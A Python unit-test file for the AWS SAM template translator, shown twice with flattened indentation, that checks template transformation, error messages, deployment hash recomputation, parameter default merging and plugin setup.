'error_s3_not_in_template',
'error_table_invalid_attributetype',
'error_invalid_resource_parameters',
'error_reserved_sam_tag',
'existing_event_logical_id',
'existing_permission_logical_id',
'existing_role_logical_id',
'error_invalid_template',
'error_globals_is_not_dict',
'error_globals_unsupported_type',
'error_globals_unsupported_property',
'error_globals_api_with_stage_name',
'error_function_policy_template_with_missing_parameter',
'error_function_policy_template_invalid_value',
'error_function_with_unknown_policy_template',
'error_function_with_invalid_policy_statement'
])
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_invalid_document(testcase):
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
expected = json.load(open(os.path.join(OUTPUT_FOLDER, testcase + '.json'), 'r'))
mock_policy_loader = MagicMock()
parameter_values = get_template_parameter_values()
with pytest.raises(InvalidDocumentException) as e:
transform(manifest, parameter_values, mock_policy_loader)
error_message = get_exception_error_message(e)
assert error_message == expected.get('errorMessage')
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_unhandled_failure_empty_managed_policy_map():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Function',
'Properties': {
'CodeUri': 's3://bucket/key',
'Handler': 'index.handler',
'Runtime': 'nodejs4.3',
'Policies': 'AmazonS3FullAccess'
}
}
}
}
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {}
with pytest.raises(Exception) as e:
transform(document, parameter_values, mock_policy_loader)
error_message = str(e.value)
assert error_message == 'Managed policy map is empty, but should not be.'
def assert_metric_call(mock, transform, transform_failure=0, invalid_document=0):
metric_dimensions = [
{
'Name': 'Transform',
'Value': transform
}
]
mock.put_metric_data.assert_called_once_with(
Namespace='ServerlessTransform',
MetricData=[
{
'MetricName': 'TransformFailure',
'Value': transform_failure,
'Unit': 'Count',
'Dimensions': metric_dimensions
},
{
'MetricName': 'InvalidDocument',
'Value': invalid_document,
'Unit': 'Count',
'Dimensions': metric_dimensions
}
]
)
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_body_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionBody": {
# Some body property will do
"a": "b"
}
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionBody"]["a"] = "foo"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
# Now let's re-deploy the document without any changes. Deployment Key must NOT change
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_definitionuri_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionUri": "s3://bucket/key"
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionUri"] = "s3://bucket/key1/key2"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
# Now let's re-deploy the document without any changes. Deployment Key must NOT change
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
class TestFunctionVersionWithParameterReferences(TestCase):
"""
Test how Lambda Function Version gets created when intrinsic functions
"""
def setUp(self):
self.document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'MyFunction': {
'Type': 'AWS::Serverless::Function',
'Properties': {
"Runtime": "nodejs4.3",
"Handler": "index.handler",
"CodeUri": {
"Bucket": {"Ref": "SomeBucket"},
"Key": {"Ref": "CodeKeyParam"}
},
"AutoPublishAlias": "live"
}
}
}
}
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_change_with_parameters(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
parameter_values["CodeKeyParam"] = "value2"
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id != second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_remains_same_without_parameter_change(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_without_resolving_reference(self):
# Now value of `CodeKeyParam` is not present in document
first_transformed_template = self._do_transform(self.document)
second_transformed_template = self._do_transform(self.document)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
def _do_transform(self, document, parameter_values=None):
# resolve the default lazily rather than calling the helper at class
# definition time (which would share one mutable default across tests)
if parameter_values is None:
parameter_values = get_template_parameter_values()
mock_policy_loader = get_policy_mock()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
return output_fragment
class TestParameterValuesHandling(TestCase):
"""
Test how user-supplied parameters & default template parameter values from template get merged
"""
def test_add_default_parameter_values_must_merge(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param2": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1",
"Param2": "template default"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template,
parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_override_user_specified_values(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_skip_params_without_defaults(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String"
},
"Param2": {
"Type": "String"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
@parameterized.expand([
# Array
param(["1", "2"]),
# String
param("something"),
# Some other non-parameter looking dictionary
param({"Param1": {"Foo": "Bar"}}),
param(None)
])
def test_add_default_parameter_values_must_ignore_invalid_template_parameters(self, template_parameters):
parameter_values = {
"Param1": "value1"
}
expected = {
"Param1": "value1"
}
sam_template = {
"Parameters": template_parameters
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(
sam_template, parameter_values)
self.assertEqual(expected, result)
class TestTemplateValidation(TestCase):
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_not_found(self):
template = {
"foo": "bar"
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_empty(self):
template = {
"Resources": {}
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_not_dict(self):
template = {
"Resources": [1,2,3]
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
class TestPluginsUsage(TestCase):
# Tests if plugins are properly injected into the translator
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_add_required_plugins(self, make_policy_template_for_function_plugin_mock):
# This is currently the only required plugin
plugin_instance = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = plugin_instance
sam_plugins = prepare_plugins([])
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_merge_input_plugins(self, make_policy_template_for_function_plugin_mock):
required_plugin = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = required_plugin
custom_plugin = BasePlugin("someplugin")
sam_plugins = prepare_plugins([custom_plugin])
self.assertEqual(6, len(sam_plugins))
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_handle_empty_input(self):
sam_plugins = prepare_plugins(None)
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.PolicyTemplatesProcessor")
@patch("samtranslator.translator.translator.PolicyTemplatesForFunctionPlugin")
def test_make_policy_template_for_function_plugin_must_work(self,
policy_templates_for_function_plugin_mock,
policy_templates_processor_mock):
default_templates = {"some": "value"}
policy_templates_processor_mock.get_default_policy_templates_json.return_value = default_templates
# mock to return instance of the processor
processor_instance = Mock()
policy_templates_processor_mock.return_value = processor_instance
# mock for plugin instance
plugin_instance = Mock()
policy_templates_for_function_plugin_mock.return_value = plugin_instance
result = make_policy_template_for_function_plugin()
self.assertEqual(plugin_instance, result)
policy_templates_processor_mock.get_default_policy_templates_json.assert_called_once_with()
policy_templates_processor_mock.assert_called_once_with(default_templates)
policy_templates_for_function_plugin_mock.assert_called_once_with(processor_instance)
@patch.object(Resource, "from_dict")
@patch("samtranslator.translator.translator.SamPlugins")
@patch("samtranslator.translator.translator.prepare_plugins")
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
def test_transform_method_must_inject_plugins_when_creating_resources(self,
prepare_plugins_mock,
sam_plugins_class_mock,
resource_from_dict_mock):
manifest = {
'Resources': {
'MyTable': {
'Type': 'AWS::Serverless::SimpleTable',
'Properties': {
}
}
}
}
sam_plugins_object_mock = Mock()
sam_plugins_class_mock.return_value = sam_plugins_object_mock
prepare_plugins_mock.return_value = sam_plugins_object_mock
resource_from_dict_mock.return_value = SamSimpleTable("MyFunction")
initial_plugins = [1,2,3]
sam_parser = Parser()
translator = Translator({}, sam_parser, plugins=initial_plugins)
translator.translate(manifest, {})
resource_from_dict_mock.assert_called_with("MyTable",
manifest["Resources"]["MyTable"],
sam_plugins=sam_plugins_object_mock)
prepare_plugins_mock.assert_called_once_with(initial_plugins)
def get_policy_mock():
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AmazonDynamoDBFullAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess',
'AmazonDynamoDBReadOnlyAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBReadOnlyAccess',
'AWSLambdaRole': 'arn:aws:iam::aws:policy/service-role/AWSLambdaRole',
}
return mock_policy_loader
def get_deployment_key(fragment):
logical_id, value = get_resource_by_type(fragment, "AWS::ApiGateway::Deployment")
return logical_id
def get_resource_by_type(template, type):
resources = template["Resources"]
for key in resources:
value = resources[key]
if "Type" in value and value.get("Type") == type:
return key, value
def get_exception_error_message(e):
return reduce(lambda message, error: message + ' ' + error.message, e.value.causes, e.value.message)
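# Illustration: for an exception whose top-level message is 'Invalid.' and
# whose causes carry messages 'err1' and 'err2', the reduce above returns
# 'Invalid. err1 err2'.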
| 40.530682
| 131
| 0.672386
|
import json
import itertools
import os.path
import hashlib
import sys
from functools import reduce, cmp_to_key
from samtranslator.translator.translator import Translator, prepare_plugins, make_policy_template_for_function_plugin
from samtranslator.parser.parser import Parser
from samtranslator.model.exceptions import InvalidDocumentException, InvalidResourceException
from samtranslator.model import Resource
from samtranslator.model.sam_resources import SamSimpleTable
from samtranslator.public.plugins import BasePlugin
from tests.translator.helpers import get_template_parameter_values
from tests.plugins.application.test_serverless_app_plugin import mock_get_region
from samtranslator.yaml_helper import yaml_parse
from parameterized import parameterized, param
import pytest
import yaml
from unittest import TestCase
from samtranslator.translator.transform import transform
from mock import Mock, MagicMock, patch
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = BASE_PATH + '/input'
OUTPUT_FOLDER = BASE_PATH + '/output'
DO_NOT_SORT = ['Layers']
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = os.path.join(BASE_PATH, 'input')
OUTPUT_FOLDER = os.path.join(BASE_PATH, 'output')
def deep_sort_lists(value):
if isinstance(value, dict):
return {k: deep_sort_lists(v) for k, v in value.items()}
if isinstance(value, list):
if sys.version_info.major < 3:
# Py2 can sort lists with complex types like dictionaries
return sorted((deep_sort_lists(x) for x in value))
else:
            # Py3 cannot sort lists with complex types, hence the custom comparator function
return sorted((deep_sort_lists(x) for x in value), key=cmp_to_key(custom_list_data_comparator))
else:
return value
def custom_list_data_comparator(obj1, obj2):
if isinstance(obj1, dict) and isinstance(obj2, dict):
obj1 = json.dumps(obj1, sort_keys=True)
obj2 = json.dumps(obj2, sort_keys=True)
try:
return (obj1 > obj2) - (obj1 < obj2)
    # In Py3 a TypeError is raised if obj1 and obj2 are of different types or are not comparable
except TypeError:
s1, s2 = type(obj1).__name__, type(obj2).__name__
return (s1 > s2) - (s1 < s2)
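# Illustrative sketch (not part of the original tests): the comparator above
# gives deep_sort_lists a deterministic order even for lists of dicts, e.g.
#   deep_sort_lists({"k": [{"b": 2}, {"a": 1}]}) == {"k": [{"a": 1}, {"b": 2}]}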
def mock_sar_service_call(self, service_call_function, logical_id, *args):
application_id = args[0]
status = 'ACTIVE'
if application_id == "no-access":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "non-existent":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "invalid-semver":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == 1:
raise InvalidResourceException(logical_id, "Type of property 'ApplicationId' is invalid.".format(application_id))
elif application_id == "preparing" and self._wait_for_template_active_status < 2:
self._wait_for_template_active_status += 1
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 2
status = "PREPARING"
elif application_id == "preparing-never-ready":
self._wait_for_template_active_status = True
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 0
status = "PREPARING"
elif application_id == "expired":
status = "EXPIRED"
message = {
'ApplicationId': args[0],
'CreationTime': 'x',
'ExpirationTime': 'x',
'SemanticVersion': '1.1.1',
'Status': status,
'TemplateId': 'id-xx-xx',
'TemplateUrl': 'https://awsserverlessrepo-changesets-xxx.s3.amazonaws.com/signed-url'
}
return message
# implicit_api, explicit_api, explicit_api_ref, api_cache tests currently have deployment IDs hardcoded in the output file.
# These ids are generated from the SHA1 hash of the swagger body for an implicit
# api and of the s3 location for an explicit api.
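# Illustrative sketch of how such a deployment id suffix is derived (it mirrors
# _generate_new_deployment_hash below and is not itself used by the tests):
#   import hashlib, json
#   body = {"swagger": "2.0"}  # hypothetical swagger body
#   data = json.dumps(body, separators=(',', ':'), sort_keys=True).encode("utf8")
#   suffix = hashlib.sha1(data).hexdigest()[:10]  # appended to the logical id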
class TestTranslatorEndToEnd(TestCase):
@parameterized.expand(
itertools.product([
's3_with_condition',
'function_with_condition',
'basic_function',
'basic_application',
'application_preparing_state',
'basic_layer',
'cloudwatchevent',
'cloudwatch_logs_with_ref',
'cloudwatchlog',
'streams',
'sqs',
'simpletable',
'simpletable_with_sse',
'implicit_api',
'explicit_api',
'api_endpoint_configuration',
'api_with_auth_all_maximum',
'api_with_auth_all_minimum',
'api_with_auth_no_default',
'api_with_method_settings',
'api_with_binary_media_types',
'api_with_minimum_compression_size',
'api_with_resource_refs',
'api_with_cors',
'api_with_cors_and_only_methods',
'api_with_cors_and_only_headers',
'api_with_cors_and_only_origins',
'api_with_cors_and_only_maxage',
'api_with_cors_and_only_credentials_false',
'api_with_cors_no_definitionbody',
'api_cache',
'api_with_access_log_setting',
'api_with_canary_setting',
'api_with_xray_tracing',
's3',
's3_create_remove',
's3_existing_lambda_notification_configuration',
's3_existing_other_notification_configuration',
's3_filter',
's3_multiple_events_same_bucket',
's3_multiple_functions',
's3_with_dependsOn',
'sns',
'sns_existing_other_subscription',
'sns_topic_outside_template',
'alexa_skill',
'alexa_skill_with_skill_id',
'iot_rule',
'layers_with_intrinsics',
'layers_all_properties',
'function_managed_inline_policy',
'unsupported_resources',
'intrinsic_functions',
'basic_function_with_tags',
'depends_on',
'function_event_conditions',
'function_with_dlq',
'function_with_kmskeyarn',
'function_with_alias',
'function_with_alias_intrinsics',
'function_with_disabled_deployment_preference',
'function_with_deployment_preference',
'function_with_deployment_preference_all_parameters',
'function_with_deployment_preference_multiple_combinations',
'function_with_alias_and_event_sources',
'function_with_resource_refs',
'function_with_deployment_and_custom_role',
'function_with_deployment_no_service_role',
'function_with_global_layers',
'function_with_layers',
'function_with_many_layers',
'function_with_permissions_boundary',
'function_with_policy_templates',
'function_with_sns_event_source_all_parameters',
'globals_for_function',
'globals_for_api',
'globals_for_simpletable',
'all_policy_templates',
'simple_table_ref_parameter_intrinsic',
'simple_table_with_table_name',
'function_concurrency',
'simple_table_with_extra_tags',
'explicit_api_with_invalid_events_config',
'no_implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_auth_and_conditions_max',
'implicit_api_with_many_conditions',
'implicit_and_explicit_api_with_conditions',
'api_with_cors_and_conditions_no_definitionbody',
'api_with_auth_and_conditions_all_max'
],
[
("aws", "ap-southeast-1"),
("aws-cn", "cn-north-1"),
("aws-us-gov", "us-gov-west-1")
] # Run all the above tests against each of the list of partitions to test against
)
)
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_success(self, testcase, partition_with_region):
partition = partition_with_region[0]
region = partition_with_region[1]
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
# To uncover unicode-related bugs, convert dict to JSON string and parse JSON back to dict
manifest = json.loads(json.dumps(manifest))
partition_folder = partition if partition != "aws" else ""
expected = json.load(open(os.path.join(OUTPUT_FOLDER,partition_folder, testcase + '.json'), 'r'))
with patch('boto3.session.Session.region_name', region):
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AWSLambdaBasicExecutionRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole'.format(partition),
'AmazonDynamoDBFullAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBFullAccess'.format(partition),
'AmazonDynamoDBReadOnlyAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBReadOnlyAccess'.format(partition),
'AWSLambdaRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaRole'.format(partition),
}
output_fragment = transform(
manifest, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
# Only update the deployment Logical Id hash in Py3.
if sys.version_info.major >= 3:
self._update_logical_id_hash(expected)
self._update_logical_id_hash(output_fragment)
assert deep_sort_lists(output_fragment) == deep_sort_lists(expected)
def _update_logical_id_hash(self, resources):
output_resources = resources.get("Resources", {})
deployment_logical_id_dict = {}
rest_api_to_swagger_hash = {}
dict_of_things_to_delete = {}
# Find all RestApis in the template
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::RestApi" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
if "Body" in resource_properties:
self._generate_new_deployment_hash(logical_id, resource_properties.get("Body"), rest_api_to_swagger_hash)
elif "BodyS3Location" in resource_dict.get("Properties"):
self._generate_new_deployment_hash(logical_id,
resource_properties.get("BodyS3Location"),
rest_api_to_swagger_hash)
# Collect all APIGW Deployments LogicalIds and generate the new ones
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Deployment" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId").get("Ref")
data_hash = rest_api_to_swagger_hash.get(rest_id)
description = resource_properties.get("Description")[:-len(data_hash)]
resource_properties["Description"] = description + data_hash
new_logical_id = logical_id[:-10] + data_hash[:10]
deployment_logical_id_dict[logical_id] = new_logical_id
dict_of_things_to_delete[logical_id] = (new_logical_id, resource_dict)
# Update References to APIGW Deployments
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Stage" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId", {}).get("Ref", "")
data_hash = rest_api_to_swagger_hash.get(rest_id)
deployment_id = resource_properties.get("DeploymentId", {}).get("Ref")
new_logical_id = deployment_logical_id_dict.get(deployment_id, "")[:-10]
new_logical_id = new_logical_id + data_hash[:10]
resource_properties.get("DeploymentId", {})["Ref"] = new_logical_id
        # To avoid mutating the template while iterating, delete only after finding everything to update
for logical_id_to_remove, tuple_to_add in dict_of_things_to_delete.items():
output_resources[tuple_to_add[0]] = tuple_to_add[1]
del output_resources[logical_id_to_remove]
# Update any Output References in the template
for output_key, output_value in resources.get("Outputs", {}).items():
if output_value.get("Ref") in deployment_logical_id_dict:
output_value["Ref"] = deployment_logical_id_dict[output_value.get("Ref")]
def _generate_new_deployment_hash(self, logical_id, dict_to_hash, rest_api_to_swagger_hash):
data_bytes = json.dumps(dict_to_hash, separators=(',', ':'), sort_keys=True).encode("utf8")
data_hash = hashlib.sha1(data_bytes).hexdigest()
rest_api_to_swagger_hash[logical_id] = data_hash
@pytest.mark.parametrize('testcase', [
'error_api_duplicate_methods_same_path',
'error_api_invalid_auth',
'error_api_invalid_definitionuri',
'error_api_invalid_definitionbody',
'error_api_invalid_restapiid',
'error_application_properties',
'error_application_does_not_exist',
'error_application_no_access',
'error_application_preparing_timeout',
'error_cors_on_external_swagger',
'error_invalid_cors_dict',
'error_cors_credentials_true_with_wildcard_origin',
'error_cors_credentials_true_without_explicit_origin',
'error_function_invalid_codeuri',
'error_function_invalid_layer',
'error_function_no_codeuri',
'error_function_no_handler',
'error_function_no_runtime',
'error_function_with_deployment_preference_missing_alias',
'error_function_with_invalid_deployment_preference_hook_property',
'error_invalid_logical_id',
'error_layer_invalid_properties',
'error_missing_queue',
'error_missing_startingposition',
'error_missing_stream',
'error_multiple_resource_errors',
'error_s3_not_in_template',
'error_table_invalid_attributetype',
'error_invalid_resource_parameters',
'error_reserved_sam_tag',
'existing_event_logical_id',
'existing_permission_logical_id',
'existing_role_logical_id',
'error_invalid_template',
'error_globals_is_not_dict',
'error_globals_unsupported_type',
'error_globals_unsupported_property',
'error_globals_api_with_stage_name',
'error_function_policy_template_with_missing_parameter',
'error_function_policy_template_invalid_value',
'error_function_with_unknown_policy_template',
'error_function_with_invalid_policy_statement'
])
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_invalid_document(testcase):
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
expected = json.load(open(os.path.join(OUTPUT_FOLDER, testcase + '.json'), 'r'))
mock_policy_loader = MagicMock()
parameter_values = get_template_parameter_values()
with pytest.raises(InvalidDocumentException) as e:
transform(manifest, parameter_values, mock_policy_loader)
error_message = get_exception_error_message(e)
assert error_message == expected.get('errorMessage')
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_unhandled_failure_empty_managed_policy_map():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Function',
'Properties': {
'CodeUri': 's3://bucket/key',
'Handler': 'index.handler',
'Runtime': 'nodejs4.3',
'Policies': 'AmazonS3FullAccess'
}
}
}
}
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {}
with pytest.raises(Exception) as e:
transform(document, parameter_values, mock_policy_loader)
error_message = str(e.value)
assert error_message == 'Managed policy map is empty, but should not be.'
def assert_metric_call(mock, transform, transform_failure=0, invalid_document=0):
metric_dimensions = [
{
'Name': 'Transform',
'Value': transform
}
]
mock.put_metric_data.assert_called_once_with(
Namespace='ServerlessTransform',
MetricData=[
{
'MetricName': 'TransformFailure',
'Value': transform_failure,
'Unit': 'Count',
'Dimensions': metric_dimensions
},
{
'MetricName': 'InvalidDocument',
'Value': invalid_document,
'Unit': 'Count',
'Dimensions': metric_dimensions
}
]
)
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_body_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionBody": {
# Some body property will do
"a": "b"
}
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionBody"]["a"] = "foo"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_definitionuri_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionUri": "s3://bucket/key"
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionUri"] = "s3://bucket/key1/key2"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
class TestFunctionVersionWithParameterReferences(TestCase):
def setUp(self):
self.document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'MyFunction': {
'Type': 'AWS::Serverless::Function',
'Properties': {
"Runtime": "nodejs4.3",
"Handler": "index.handler",
"CodeUri": {
"Bucket": {"Ref": "SomeBucket"},
"Key": {"Ref": "CodeKeyParam"}
},
"AutoPublishAlias": "live"
}
}
}
}
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_change_with_parameters(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
parameter_values["CodeKeyParam"] = "value2"
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id != second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_remains_same_without_parameter_change(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
